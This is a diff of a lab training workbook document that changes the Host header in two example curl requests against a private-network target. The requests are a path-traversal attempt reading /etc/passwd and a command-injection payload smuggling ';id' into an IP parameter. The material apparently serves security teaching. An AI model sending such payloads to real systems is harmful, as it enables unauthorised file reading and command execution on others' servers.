--- a/contents/battle-workbook/web-vuln-w07.docx
+++ b/contents/battle-workbook/web-vuln-w07.docx
@@ -308,9 +308,9 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -H "Host: mediforum.6v6.lab" "http://192.168.0.161/api/debug/echo?file=wv07r1-kim/../../../../etc/passwd"</w:t>
+        <w:t>curl -s -H "Host: mediforum.el34.lab" "http://192.168.0.161/api/debug/echo?file=wv07r1-kim/../../../../etc/passwd"</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: mediforum.6v6.lab" "http://192.168.0.161/api/debug/echo?ip=127.0.0.1;id%23wv07r1-kim&amp;Submit=Submit"</w:t>
+        <w:t>curl -s -H "Host: mediforum.el34.lab" "http://192.168.0.161/api/debug/echo?ip=127.0.0.1;id%23wv07r1-kim&amp;Submit=Submit"</w:t>
       </w:r>
     </w:p>
     <w:p>
